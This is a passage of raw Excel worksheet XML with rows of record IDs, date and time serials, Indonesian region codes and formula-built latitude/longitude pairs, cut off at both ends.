        <v>0.37708333333333338</v>
      </c>
      <c r="D2285" t="s">
        <v>2648</v>
      </c>
      <c r="E2285" t="s">
        <v>23</v>
      </c>
      <c r="G2285" t="s">
        <v>7714</v>
      </c>
      <c r="H2285" t="s">
        <v>26</v>
      </c>
      <c r="J2285" t="s">
        <v>2905</v>
      </c>
      <c r="L2285" t="s">
        <v>7715</v>
      </c>
      <c r="M2285">
        <v>3171090005</v>
      </c>
      <c r="N2285">
        <v>3171090</v>
      </c>
      <c r="O2285">
        <v>3171</v>
      </c>
      <c r="P2285">
        <v>31</v>
      </c>
      <c r="Q2285" t="s">
        <v>1300</v>
      </c>
      <c r="R2285" t="s">
        <v>347</v>
      </c>
      <c r="S2285" t="s">
        <v>108</v>
      </c>
      <c r="T2285" t="s">
        <v>33</v>
      </c>
      <c r="U2285" s="5">
        <v>10685983</v>
      </c>
      <c r="V2285" s="5" t="s">
        <v>16485</v>
      </c>
      <c r="W2285" s="5">
        <v>-622103</v>
      </c>
      <c r="X2285" t="s">
        <v>20233</v>
      </c>
      <c r="Y2285" t="str">
        <f t="shared" si="35"/>
        <v>-6.22103,106.85983</v>
      </c>
    </row>
    <row r="2286" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2286">
        <v>196772</v>
      </c>
      <c r="B2286" s="1">
        <v>44056</v>
      </c>
      <c r="C2286" s="2">
        <v>0.37986111111111115</v>
      </c>
      <c r="D2286" t="s">
        <v>2648</v>
      </c>
      <c r="E2286" t="s">
        <v>23</v>
      </c>
      <c r="G2286" t="s">
        <v>7716</v>
      </c>
      <c r="H2286" t="s">
        <v>26</v>
      </c>
      <c r="J2286" t="s">
        <v>7717</v>
      </c>
      <c r="L2286" t="s">
        <v>7718</v>
      </c>
      <c r="M2286">
        <v>3174080004</v>
      </c>
      <c r="N2286">
        <v>3174080</v>
      </c>
      <c r="O2286">
        <v>3174</v>
      </c>
      <c r="P2286">
        <v>31</v>
      </c>
      <c r="Q2286" t="s">
        <v>1696</v>
      </c>
      <c r="R2286" t="s">
        <v>695</v>
      </c>
      <c r="S2286" t="s">
        <v>32</v>
      </c>
      <c r="T2286" t="s">
        <v>33</v>
      </c>
      <c r="U2286" s="5">
        <v>10672982</v>
      </c>
      <c r="V2286" s="5" t="s">
        <v>16486</v>
      </c>
      <c r="W2286" s="5">
        <v>-612165</v>
      </c>
      <c r="X2286" t="s">
        <v>20234</v>
      </c>
      <c r="Y2286" t="str">
        <f t="shared" si="35"/>
        <v>-6.12165,106.72982</v>
      </c>
    </row>
    <row r="2287" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2287">
        <v>196786</v>
      </c>
      <c r="B2287" s="1">
        <v>44056</v>
      </c>
      <c r="C2287" s="2">
        <v>0.3923611111111111</v>
      </c>
      <c r="D2287" t="s">
        <v>2648</v>
      </c>
      <c r="E2287" t="s">
        <v>23</v>
      </c>
      <c r="G2287" t="s">
        <v>7719</v>
      </c>
      <c r="H2287" t="s">
        <v>26</v>
      </c>
      <c r="J2287" t="s">
        <v>2737</v>
      </c>
      <c r="L2287" t="s">
        <v>7720</v>
      </c>
      <c r="M2287">
        <v>3173040001</v>
      </c>
      <c r="N2287">
        <v>3173040</v>
      </c>
      <c r="O2287">
        <v>3173</v>
      </c>
      <c r="P2287">
        <v>31</v>
      </c>
      <c r="Q2287" t="s">
        <v>1598</v>
      </c>
      <c r="R2287" t="s">
        <v>1598</v>
      </c>
      <c r="S2287" t="s">
        <v>62</v>
      </c>
      <c r="T2287" t="s">
        <v>33</v>
      </c>
      <c r="U2287" s="5">
        <v>10685563</v>
      </c>
      <c r="V2287" s="5" t="s">
        <v>16487</v>
      </c>
      <c r="W2287" s="5">
        <v>-618839</v>
      </c>
      <c r="X2287" t="s">
        <v>18864</v>
      </c>
      <c r="Y2287" t="str">
        <f t="shared" si="35"/>
        <v>-6.18839,106.85563</v>
      </c>
    </row>
    <row r="2288" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2288">
        <v>196824</v>
      </c>
      <c r="B2288" s="1">
        <v>44056</v>
      </c>
      <c r="C2288" s="2">
        <v>0.41827546296296297</v>
      </c>
      <c r="D2288" t="s">
        <v>22</v>
      </c>
      <c r="E2288" t="s">
        <v>23</v>
      </c>
      <c r="F2288" t="s">
        <v>7721</v>
      </c>
      <c r="G2288" t="s">
        <v>7722</v>
      </c>
      <c r="H2288" t="s">
        <v>26</v>
      </c>
      <c r="I2288" t="s">
        <v>1633</v>
      </c>
      <c r="J2288" t="s">
        <v>7723</v>
      </c>
      <c r="M2288">
        <v>3175030007</v>
      </c>
      <c r="N2288">
        <v>3175030</v>
      </c>
      <c r="O2288">
        <v>3175</v>
      </c>
      <c r="P2288">
        <v>31</v>
      </c>
      <c r="Q2288" t="s">
        <v>1562</v>
      </c>
      <c r="R2288" t="s">
        <v>1563</v>
      </c>
      <c r="S2288" t="s">
        <v>547</v>
      </c>
      <c r="T2288" t="s">
        <v>33</v>
      </c>
      <c r="U2288" s="5">
        <v>10687293</v>
      </c>
      <c r="V2288" s="5" t="s">
        <v>16488</v>
      </c>
      <c r="W2288" s="5">
        <v>-611646</v>
      </c>
      <c r="X2288" t="s">
        <v>20235</v>
      </c>
      <c r="Y2288" t="str">
        <f t="shared" si="35"/>
        <v>-6.11646,106.87293</v>
      </c>
    </row>
    <row r="2289" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2289">
        <v>196880</v>
      </c>
      <c r="B2289" s="1">
        <v>44056</v>
      </c>
      <c r="C2289" s="2">
        <v>0.4604166666666667</v>
      </c>
      <c r="D2289" t="s">
        <v>2648</v>
      </c>
      <c r="E2289" t="s">
        <v>23</v>
      </c>
      <c r="G2289" t="s">
        <v>7724</v>
      </c>
      <c r="H2289" t="s">
        <v>26</v>
      </c>
      <c r="J2289" t="s">
        <v>7725</v>
      </c>
      <c r="L2289" t="s">
        <v>7726</v>
      </c>
      <c r="M2289">
        <v>3175060006</v>
      </c>
      <c r="N2289">
        <v>3175060</v>
      </c>
      <c r="O2289">
        <v>3175</v>
      </c>
      <c r="P2289">
        <v>31</v>
      </c>
      <c r="Q2289" t="s">
        <v>2409</v>
      </c>
      <c r="R2289" t="s">
        <v>2279</v>
      </c>
      <c r="S2289" t="s">
        <v>547</v>
      </c>
      <c r="T2289" t="s">
        <v>33</v>
      </c>
      <c r="U2289" s="5">
        <v>10692793</v>
      </c>
      <c r="V2289" s="5" t="s">
        <v>16489</v>
      </c>
      <c r="W2289" s="5">
        <v>-612732</v>
      </c>
      <c r="X2289" t="s">
        <v>20236</v>
      </c>
      <c r="Y2289" t="str">
        <f t="shared" si="35"/>
        <v>-6.12732,106.92793</v>
      </c>
    </row>
    <row r="2290" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2290">
        <v>197083</v>
      </c>
      <c r="B2290" s="1">
        <v>44056</v>
      </c>
      <c r="C2290" s="2">
        <v>0.60486111111111118</v>
      </c>
      <c r="D2290" t="s">
        <v>2648</v>
      </c>
      <c r="E2290" t="s">
        <v>23</v>
      </c>
      <c r="G2290" t="s">
        <v>7727</v>
      </c>
      <c r="H2290" t="s">
        <v>26</v>
      </c>
      <c r="J2290" t="s">
        <v>3300</v>
      </c>
      <c r="L2290" t="s">
        <v>7728</v>
      </c>
      <c r="M2290">
        <v>3171020005</v>
      </c>
      <c r="N2290">
        <v>3171020</v>
      </c>
      <c r="O2290">
        <v>3171</v>
      </c>
      <c r="P2290">
        <v>31</v>
      </c>
      <c r="Q2290" t="s">
        <v>483</v>
      </c>
      <c r="R2290" t="s">
        <v>484</v>
      </c>
      <c r="S2290" t="s">
        <v>108</v>
      </c>
      <c r="T2290" t="s">
        <v>33</v>
      </c>
      <c r="U2290" s="5">
        <v>10683361</v>
      </c>
      <c r="V2290" s="5" t="s">
        <v>16490</v>
      </c>
      <c r="W2290" s="5">
        <v>-628918</v>
      </c>
      <c r="X2290" t="s">
        <v>20237</v>
      </c>
      <c r="Y2290" t="str">
        <f t="shared" si="35"/>
        <v>-6.28918,106.83361</v>
      </c>
    </row>
    <row r="2291" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2291">
        <v>199339</v>
      </c>
      <c r="B2291" s="1">
        <v>44058</v>
      </c>
      <c r="C2291" s="2">
        <v>0.29236111111111113</v>
      </c>
      <c r="D2291" t="s">
        <v>2648</v>
      </c>
      <c r="E2291" t="s">
        <v>23</v>
      </c>
      <c r="G2291" t="s">
        <v>7729</v>
      </c>
      <c r="H2291" t="s">
        <v>26</v>
      </c>
      <c r="J2291" t="s">
        <v>7730</v>
      </c>
      <c r="L2291" t="s">
        <v>7731</v>
      </c>
      <c r="M2291">
        <v>3172050003</v>
      </c>
      <c r="N2291">
        <v>3172050</v>
      </c>
      <c r="O2291">
        <v>3172</v>
      </c>
      <c r="P2291">
        <v>31</v>
      </c>
      <c r="Q2291" t="s">
        <v>2896</v>
      </c>
      <c r="R2291" t="s">
        <v>358</v>
      </c>
      <c r="S2291" t="s">
        <v>49</v>
      </c>
      <c r="T2291" t="s">
        <v>33</v>
      </c>
      <c r="U2291" s="5">
        <v>10686865</v>
      </c>
      <c r="V2291" s="5" t="s">
        <v>16491</v>
      </c>
      <c r="W2291" s="5">
        <v>-628018</v>
      </c>
      <c r="X2291" t="s">
        <v>20238</v>
      </c>
      <c r="Y2291" t="str">
        <f t="shared" si="35"/>
        <v>-6.28018,106.86865</v>
      </c>
    </row>
    <row r="2292" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2292">
        <v>199352</v>
      </c>
      <c r="B2292" s="1">
        <v>44061</v>
      </c>
      <c r="C2292" s="2">
        <v>0.40024305555555556</v>
      </c>
      <c r="D2292" t="s">
        <v>22</v>
      </c>
      <c r="E2292" t="s">
        <v>23</v>
      </c>
      <c r="F2292" t="s">
        <v>7732</v>
      </c>
      <c r="H2292" t="s">
        <v>7086</v>
      </c>
      <c r="I2292" t="s">
        <v>7733</v>
      </c>
      <c r="J2292" t="s">
        <v>2627</v>
      </c>
      <c r="L2292" t="s">
        <v>7734</v>
      </c>
      <c r="M2292">
        <v>3204130003</v>
      </c>
      <c r="N2292">
        <v>3204130</v>
      </c>
      <c r="O2292">
        <v>3204</v>
      </c>
      <c r="P2292">
        <v>32</v>
      </c>
      <c r="Q2292" t="s">
        <v>7735</v>
      </c>
      <c r="R2292" t="s">
        <v>1802</v>
      </c>
      <c r="S2292" t="s">
        <v>1464</v>
      </c>
      <c r="T2292" t="s">
        <v>42</v>
      </c>
      <c r="U2292" s="5">
        <v>10770751</v>
      </c>
      <c r="V2292" s="5" t="s">
        <v>16492</v>
      </c>
      <c r="W2292" s="5">
        <v>-706512</v>
      </c>
      <c r="X2292" t="s">
        <v>20239</v>
      </c>
      <c r="Y2292" t="str">
        <f t="shared" si="35"/>
        <v>-7.06512,107.70751</v>
      </c>
    </row>
    <row r="2293" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2293">
        <v>199353</v>
      </c>
      <c r="B2293" s="1">
        <v>44068</v>
      </c>
      <c r="C2293" s="2">
        <v>8.0555555555555561E-2</v>
      </c>
      <c r="D2293" t="s">
        <v>2648</v>
      </c>
      <c r="E2293" t="s">
        <v>23</v>
      </c>
      <c r="G2293" t="s">
        <v>7736</v>
      </c>
      <c r="H2293" t="s">
        <v>26</v>
      </c>
      <c r="J2293" t="s">
        <v>5962</v>
      </c>
      <c r="L2293" t="s">
        <v>7737</v>
      </c>
      <c r="M2293">
        <v>3175060005</v>
      </c>
      <c r="N2293">
        <v>3175060</v>
      </c>
      <c r="O2293">
        <v>3175</v>
      </c>
      <c r="P2293">
        <v>31</v>
      </c>
      <c r="Q2293" t="s">
        <v>5964</v>
      </c>
      <c r="R2293" t="s">
        <v>2279</v>
      </c>
      <c r="S2293" t="s">
        <v>547</v>
      </c>
      <c r="T2293" t="s">
        <v>33</v>
      </c>
      <c r="U2293" s="5">
        <v>10693781</v>
      </c>
      <c r="V2293" s="5" t="s">
        <v>16493</v>
      </c>
      <c r="W2293" s="5">
        <v>-613286</v>
      </c>
      <c r="X2293" t="s">
        <v>20240</v>
      </c>
      <c r="Y2293" t="str">
        <f t="shared" si="35"/>
        <v>-6.13286,106.93781</v>
      </c>
    </row>
    <row r="2294" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2294">
        <v>199355</v>
      </c>
      <c r="B2294" s="1">
        <v>44068</v>
      </c>
      <c r="C2294" s="2">
        <v>0.28819444444444448</v>
      </c>
      <c r="D2294" t="s">
        <v>2648</v>
      </c>
      <c r="E2294" t="s">
        <v>23</v>
      </c>
      <c r="G2294" t="s">
        <v>7738</v>
      </c>
      <c r="H2294" t="s">
        <v>26</v>
      </c>
      <c r="J2294" t="s">
        <v>7739</v>
      </c>
      <c r="L2294" t="s">
        <v>7740</v>
      </c>
      <c r="M2294">
        <v>3174060008</v>
      </c>
      <c r="N2294">
        <v>3174060</v>
      </c>
      <c r="O2294">
        <v>3174</v>
      </c>
      <c r="P2294">
        <v>31</v>
      </c>
      <c r="Q2294" t="s">
        <v>7741</v>
      </c>
      <c r="R2294" t="s">
        <v>1762</v>
      </c>
      <c r="S2294" t="s">
        <v>32</v>
      </c>
      <c r="T2294" t="s">
        <v>33</v>
      </c>
      <c r="U2294" s="5">
        <v>10681426</v>
      </c>
      <c r="V2294" s="5" t="s">
        <v>16494</v>
      </c>
      <c r="W2294" s="5">
        <v>-614028</v>
      </c>
      <c r="X2294" t="s">
        <v>19519</v>
      </c>
      <c r="Y2294" t="str">
        <f t="shared" si="35"/>
        <v>-6.14028,106.81426</v>
      </c>
    </row>
    <row r="2295" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2295">
        <v>199396</v>
      </c>
      <c r="B2295" s="1">
        <v>44069</v>
      </c>
      <c r="C2295" s="2">
        <v>7.6388888888888895E-2</v>
      </c>
      <c r="D2295" t="s">
        <v>2648</v>
      </c>
      <c r="E2295" t="s">
        <v>23</v>
      </c>
      <c r="G2295" t="s">
        <v>7742</v>
      </c>
      <c r="H2295" t="s">
        <v>26</v>
      </c>
      <c r="J2295" t="s">
        <v>6408</v>
      </c>
      <c r="L2295" t="s">
        <v>7743</v>
      </c>
      <c r="M2295">
        <v>3174080001</v>
      </c>
      <c r="N2295">
        <v>3174080</v>
      </c>
      <c r="O2295">
        <v>3174</v>
      </c>
      <c r="P2295">
        <v>31</v>
      </c>
      <c r="Q2295" t="s">
        <v>694</v>
      </c>
      <c r="R2295" t="s">
        <v>695</v>
      </c>
      <c r="S2295" t="s">
        <v>32</v>
      </c>
      <c r="T2295" t="s">
        <v>33</v>
      </c>
      <c r="U2295" s="5">
        <v>10670293</v>
      </c>
      <c r="V2295" s="5" t="s">
        <v>16495</v>
      </c>
      <c r="W2295" s="5">
        <v>-616500</v>
      </c>
      <c r="X2295" t="s">
        <v>20241</v>
      </c>
      <c r="Y2295" t="str">
        <f t="shared" si="35"/>
        <v>-6.16500,106.70293</v>
      </c>
    </row>
    <row r="2296" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2296">
        <v>199447</v>
      </c>
      <c r="B2296" s="1">
        <v>44071</v>
      </c>
      <c r="C2296" s="2">
        <v>0.17986111111111111</v>
      </c>
      <c r="D2296" t="s">
        <v>2648</v>
      </c>
      <c r="E2296" t="s">
        <v>23</v>
      </c>
      <c r="G2296" t="s">
        <v>7744</v>
      </c>
      <c r="H2296" t="s">
        <v>26</v>
      </c>
      <c r="J2296" t="s">
        <v>5962</v>
      </c>
      <c r="L2296" t="s">
        <v>7745</v>
      </c>
      <c r="M2296">
        <v>3175060005</v>
      </c>
      <c r="N2296">
        <v>3175060</v>
      </c>
      <c r="O2296">
        <v>3175</v>
      </c>
      <c r="P2296">
        <v>31</v>
      </c>
      <c r="Q2296" t="s">
        <v>5964</v>
      </c>
      <c r="R2296" t="s">
        <v>2279</v>
      </c>
      <c r="S2296" t="s">
        <v>547</v>
      </c>
      <c r="T2296" t="s">
        <v>33</v>
      </c>
      <c r="U2296" s="5">
        <v>10693787</v>
      </c>
      <c r="V2296" s="5" t="s">
        <v>16496</v>
      </c>
      <c r="W2296" s="5">
        <v>-613290</v>
      </c>
      <c r="X2296" t="s">
        <v>20242</v>
      </c>
      <c r="Y2296" t="str">
        <f t="shared" si="35"/>
        <v>-6.13290,106.93787</v>
      </c>
    </row>
    <row r="2297" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2297">
        <v>199481</v>
      </c>
      <c r="B2297" s="1">
        <v>44072</v>
      </c>
      <c r="C2297" s="2">
        <v>9.1666666666666674E-2</v>
      </c>
      <c r="D2297" t="s">
        <v>2648</v>
      </c>
      <c r="E2297" t="s">
        <v>23</v>
      </c>
      <c r="G2297" t="s">
        <v>7746</v>
      </c>
      <c r="H2297" t="s">
        <v>26</v>
      </c>
      <c r="J2297" t="s">
        <v>7747</v>
      </c>
      <c r="L2297" t="s">
        <v>7748</v>
      </c>
      <c r="M2297">
        <v>3174050008</v>
      </c>
      <c r="N2297">
        <v>3174050</v>
      </c>
      <c r="O2297">
        <v>3174</v>
      </c>
      <c r="P2297">
        <v>31</v>
      </c>
      <c r="Q2297" t="s">
        <v>2825</v>
      </c>
      <c r="R2297" t="s">
        <v>2826</v>
      </c>
      <c r="S2297" t="s">
        <v>32</v>
      </c>
      <c r="T2297" t="s">
        <v>33</v>
      </c>
      <c r="U2297" s="5">
        <v>10680105</v>
      </c>
      <c r="V2297" s="5" t="s">
        <v>16497</v>
      </c>
      <c r="W2297" s="5">
        <v>-614587</v>
      </c>
      <c r="X2297" t="s">
        <v>20243</v>
      </c>
      <c r="Y2297" t="str">
        <f t="shared" si="35"/>
        <v>-6.14587,106.80105</v>
      </c>
    </row>
    <row r="2298" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2298">
        <v>199489</v>
      </c>
      <c r="B2298" s="1">
        <v>44073</v>
      </c>
      <c r="C2298" s="2">
        <v>9.5138888888888884E-2</v>
      </c>
      <c r="D2298" t="s">
        <v>2648</v>
      </c>
      <c r="E2298" t="s">
        <v>23</v>
      </c>
      <c r="G2298" t="s">
        <v>7749</v>
      </c>
      <c r="H2298" t="s">
        <v>26</v>
      </c>
      <c r="J2298" t="s">
        <v>7725</v>
      </c>
      <c r="L2298" t="s">
        <v>7750</v>
      </c>
      <c r="M2298">
        <v>3175060006</v>
      </c>
      <c r="N2298">
        <v>3175060</v>
      </c>
      <c r="O2298">
        <v>3175</v>
      </c>
      <c r="P2298">
        <v>31</v>
      </c>
      <c r="Q2298" t="s">
        <v>2409</v>
      </c>
      <c r="R2298" t="s">
        <v>2279</v>
      </c>
      <c r="S2298" t="s">
        <v>547</v>
      </c>
      <c r="T2298" t="s">
        <v>33</v>
      </c>
      <c r="U2298" s="5">
        <v>10692738</v>
      </c>
      <c r="V2298" s="5" t="s">
        <v>16498</v>
      </c>
      <c r="W2298" s="5">
        <v>-612989</v>
      </c>
      <c r="X2298" t="s">
        <v>20244</v>
      </c>
      <c r="Y2298" t="str">
        <f t="shared" si="35"/>
        <v>-6.12989,106.92738</v>
      </c>
    </row>
    <row r="2299" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2299">
        <v>199521</v>
      </c>
      <c r="B2299" s="1">
        <v>44073</v>
      </c>
      <c r="C2299" s="2">
        <v>0.4055555555555555</v>
      </c>
      <c r="D2299" t="s">
        <v>2648</v>
      </c>
      <c r="E2299" t="s">
        <v>23</v>
      </c>
      <c r="G2299" t="s">
        <v>7751</v>
      </c>
      <c r="H2299" t="s">
        <v>26</v>
      </c>
      <c r="J2299" t="s">
        <v>7725</v>
      </c>
      <c r="L2299" t="s">
        <v>7752</v>
      </c>
      <c r="M2299">
        <v>3175060006</v>
      </c>
      <c r="N2299">
        <v>3175060</v>
      </c>
      <c r="O2299">
        <v>3175</v>
      </c>
      <c r="P2299">
        <v>31</v>
      </c>
      <c r="Q2299" t="s">
        <v>2409</v>
      </c>
      <c r="R2299" t="s">
        <v>2279</v>
      </c>
      <c r="S2299" t="s">
        <v>547</v>
      </c>
      <c r="T2299" t="s">
        <v>33</v>
      </c>
      <c r="U2299" s="5">
        <v>10692738</v>
      </c>
      <c r="V2299" s="5" t="s">
        <v>16498</v>
      </c>
      <c r="W2299" s="5">
        <v>-612991</v>
      </c>
      <c r="X2299" t="s">
        <v>20245</v>
      </c>
      <c r="Y2299" t="str">
        <f t="shared" si="35"/>
        <v>-6.12991,106.92738</v>
      </c>
    </row>
    <row r="2300" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2300">
        <v>199547</v>
      </c>
      <c r="B2300" s="1">
        <v>44076</v>
      </c>
      <c r="C2300" s="2">
        <v>0.22152777777777777</v>
      </c>
      <c r="D2300" t="s">
        <v>2648</v>
      </c>
      <c r="E2300" t="s">
        <v>23</v>
      </c>
      <c r="G2300" t="s">
        <v>7753</v>
      </c>
      <c r="H2300" t="s">
        <v>26</v>
      </c>
      <c r="J2300" t="s">
        <v>4778</v>
      </c>
      <c r="L2300" t="s">
        <v>7754</v>
      </c>
      <c r="M2300">
        <v>3174020004</v>
      </c>
      <c r="N2300">
        <v>3174020</v>
      </c>
      <c r="O2300">
        <v>3174</v>
      </c>
      <c r="P2300">
        <v>31</v>
      </c>
      <c r="Q2300" t="s">
        <v>31</v>
      </c>
      <c r="R2300" t="s">
        <v>31</v>
      </c>
      <c r="S2300" t="s">
        <v>32</v>
      </c>
      <c r="T2300" t="s">
        <v>33</v>
      </c>
      <c r="U2300" s="5">
        <v>10676526</v>
      </c>
      <c r="V2300" s="5" t="s">
        <v>16499</v>
      </c>
      <c r="W2300" s="5">
        <v>-619908</v>
      </c>
      <c r="X2300" t="s">
        <v>20246</v>
      </c>
      <c r="Y2300" t="str">
        <f t="shared" si="35"/>
        <v>-6.19908,106.76526</v>
      </c>
    </row>
    <row r="2301" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2301">
        <v>199549</v>
      </c>
      <c r="B2301" s="1">
        <v>44076</v>
      </c>
      <c r="C2301" s="2">
        <v>0.52638888888888891</v>
      </c>
      <c r="D2301" t="s">
        <v>2648</v>
      </c>
      <c r="E2301" t="s">
        <v>23</v>
      </c>
      <c r="G2301" t="s">
        <v>7755</v>
      </c>
      <c r="H2301" t="s">
        <v>26</v>
      </c>
      <c r="J2301" t="s">
        <v>1698</v>
      </c>
      <c r="L2301" t="s">
        <v>7756</v>
      </c>
      <c r="M2301">
        <v>3174080003</v>
      </c>
      <c r="N2301">
        <v>3174080</v>
      </c>
      <c r="O2301">
        <v>3174</v>
      </c>
      <c r="P2301">
        <v>31</v>
      </c>
      <c r="Q2301" t="s">
        <v>1700</v>
      </c>
      <c r="R2301" t="s">
        <v>695</v>
      </c>
      <c r="S2301" t="s">
        <v>32</v>
      </c>
      <c r="T2301" t="s">
        <v>33</v>
      </c>
      <c r="U2301" s="5">
        <v>10670750</v>
      </c>
      <c r="V2301" s="5" t="s">
        <v>16500</v>
      </c>
      <c r="W2301" s="5">
        <v>-613113</v>
      </c>
      <c r="X2301" t="s">
        <v>20247</v>
      </c>
      <c r="Y2301" t="str">
        <f t="shared" si="35"/>
        <v>-6.13113,106.70750</v>
      </c>
    </row>
    <row r="2302" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2302">
        <v>199656</v>
      </c>
      <c r="B2302" s="1">
        <v>44079</v>
      </c>
      <c r="C2302" s="2">
        <v>0.13388888888888889</v>
      </c>
      <c r="D2302" t="s">
        <v>22</v>
      </c>
      <c r="E2302" t="s">
        <v>23</v>
      </c>
      <c r="F2302" t="s">
        <v>7757</v>
      </c>
      <c r="G2302" t="s">
        <v>7758</v>
      </c>
      <c r="H2302" t="s">
        <v>7086</v>
      </c>
      <c r="I2302" t="s">
        <v>7421</v>
      </c>
      <c r="J2302" t="s">
        <v>2627</v>
      </c>
      <c r="L2302" t="s">
        <v>7759</v>
      </c>
      <c r="M2302">
        <v>3272020005</v>
      </c>
      <c r="N2302">
        <v>3272020</v>
      </c>
      <c r="O2302">
        <v>3272</v>
      </c>
      <c r="P2302">
        <v>32</v>
      </c>
      <c r="Q2302" t="s">
        <v>7760</v>
      </c>
      <c r="R2302" t="s">
        <v>7761</v>
      </c>
      <c r="S2302" t="s">
        <v>7762</v>
      </c>
      <c r="T2302" t="s">
        <v>42</v>
      </c>
      <c r="U2302" s="5">
        <v>10692944</v>
      </c>
      <c r="V2302" s="5" t="s">
        <v>16501</v>
      </c>
      <c r="W2302" s="5">
        <v>-692551</v>
      </c>
      <c r="X2302" t="s">
        <v>20248</v>
      </c>
      <c r="Y2302" t="str">
        <f t="shared" si="35"/>
        <v>-6.92551,106.92944</v>
      </c>
    </row>
    <row r="2303" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2303">
        <v>199660</v>
      </c>
      <c r="B2303" s="1">
        <v>44084</v>
      </c>
      <c r="C2303" s="2">
        <v>0.3576388888888889</v>
      </c>
      <c r="D2303" t="s">
        <v>2648</v>
      </c>
      <c r="E2303" t="s">
        <v>23</v>
      </c>
      <c r="G2303" t="s">
        <v>7763</v>
      </c>
      <c r="H2303" t="s">
        <v>26</v>
      </c>
      <c r="J2303" t="s">
        <v>7764</v>
      </c>
      <c r="L2303" t="s">
        <v>7765</v>
      </c>
      <c r="M2303">
        <v>3174080002</v>
      </c>
      <c r="N2303">
        <v>3174080</v>
      </c>
      <c r="O2303">
        <v>3174</v>
      </c>
      <c r="P2303">
        <v>31</v>
      </c>
      <c r="Q2303" t="s">
        <v>5723</v>
      </c>
      <c r="R2303" t="s">
        <v>695</v>
      </c>
      <c r="S2303" t="s">
        <v>32</v>
      </c>
      <c r="T2303" t="s">
        <v>33</v>
      </c>
      <c r="U2303" s="5">
        <v>10669774</v>
      </c>
      <c r="V2303" s="5" t="s">
        <v>16502</v>
      </c>
      <c r="W2303" s="5">
        <v>-615056</v>
      </c>
      <c r="X2303" t="s">
        <v>20249</v>
      </c>
      <c r="Y2303" t="str">
        <f t="shared" si="35"/>
        <v>-6.15056,106.69774</v>
      </c>
    </row>
    <row r="2304" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2304">
        <v>199677</v>
      </c>
      <c r="B2304" s="1">
        <v>44086</v>
      </c>
      <c r="C2304" s="2">
        <v>0.51184027777777785</v>
      </c>
      <c r="D2304" t="s">
        <v>22</v>
      </c>
      <c r="E2304" t="s">
        <v>23</v>
      </c>
      <c r="F2304" t="s">
        <v>7766</v>
      </c>
      <c r="G2304" t="s">
        <v>7767</v>
      </c>
      <c r="H2304" t="s">
        <v>26</v>
      </c>
      <c r="I2304" t="s">
        <v>3704</v>
      </c>
      <c r="J2304" t="s">
        <v>7637</v>
      </c>
      <c r="M2304">
        <v>6202230029</v>
      </c>
      <c r="N2304">
        <v>6202230</v>
      </c>
      <c r="O2304">
        <v>6202</v>
      </c>
      <c r="P2304">
        <v>62</v>
      </c>
      <c r="Q2304" t="s">
        <v>7768</v>
      </c>
      <c r="R2304" t="s">
        <v>7769</v>
      </c>
      <c r="S2304" t="s">
        <v>7770</v>
      </c>
      <c r="T2304" t="s">
        <v>7642</v>
      </c>
      <c r="U2304" s="5">
        <v>11257793</v>
      </c>
      <c r="V2304" s="5" t="s">
        <v>16503</v>
      </c>
      <c r="W2304" s="5">
        <v>-126418</v>
      </c>
      <c r="X2304" t="s">
        <v>20250</v>
      </c>
      <c r="Y2304" t="str">
        <f t="shared" si="35"/>
        <v>-1.26418,112.57793</v>
      </c>
    </row>
    <row r="2305" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2305">
        <v>199678</v>
      </c>
      <c r="B2305" s="1">
        <v>44087</v>
      </c>
      <c r="C2305" s="2">
        <v>0.66112268518518513</v>
      </c>
      <c r="D2305" t="s">
        <v>22</v>
      </c>
      <c r="E2305" t="s">
        <v>23</v>
      </c>
      <c r="F2305" t="s">
        <v>7771</v>
      </c>
      <c r="G2305" t="s">
        <v>7772</v>
      </c>
      <c r="H2305" t="s">
        <v>26</v>
      </c>
      <c r="I2305" t="s">
        <v>592</v>
      </c>
      <c r="J2305" t="s">
        <v>2627</v>
      </c>
      <c r="L2305" t="s">
        <v>7773</v>
      </c>
      <c r="M2305">
        <v>3277010001</v>
      </c>
      <c r="N2305">
        <v>3277010</v>
      </c>
      <c r="O2305">
        <v>3277</v>
      </c>
      <c r="P2305">
        <v>32</v>
      </c>
      <c r="Q2305" t="s">
        <v>7774</v>
      </c>
      <c r="R2305" t="s">
        <v>7775</v>
      </c>
      <c r="S2305" t="s">
        <v>7776</v>
      </c>
      <c r="T2305" t="s">
        <v>42</v>
      </c>
      <c r="U2305" s="5">
        <v>10755734</v>
      </c>
      <c r="V2305" s="5" t="s">
        <v>16504</v>
      </c>
      <c r="W2305" s="5">
        <v>-692943</v>
      </c>
      <c r="X2305" t="s">
        <v>20251</v>
      </c>
      <c r="Y2305" t="str">
        <f t="shared" si="35"/>
        <v>-6.92943,107.55734</v>
      </c>
    </row>
    <row r="2306" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2306">
        <v>199679</v>
      </c>
      <c r="B2306" s="1">
        <v>44087</v>
      </c>
      <c r="C2306" s="2">
        <v>0.74554398148148149</v>
      </c>
      <c r="D2306" t="s">
        <v>22</v>
      </c>
      <c r="E2306" t="s">
        <v>23</v>
      </c>
      <c r="F2306" t="s">
        <v>7777</v>
      </c>
      <c r="G2306" t="s">
        <v>7778</v>
      </c>
      <c r="H2306" t="s">
        <v>26</v>
      </c>
      <c r="I2306" t="s">
        <v>1005</v>
      </c>
      <c r="J2306" t="s">
        <v>7436</v>
      </c>
      <c r="L2306" t="s">
        <v>7779</v>
      </c>
      <c r="M2306">
        <v>6110050014</v>
      </c>
      <c r="N2306">
        <v>6110050</v>
      </c>
      <c r="O2306">
        <v>6110</v>
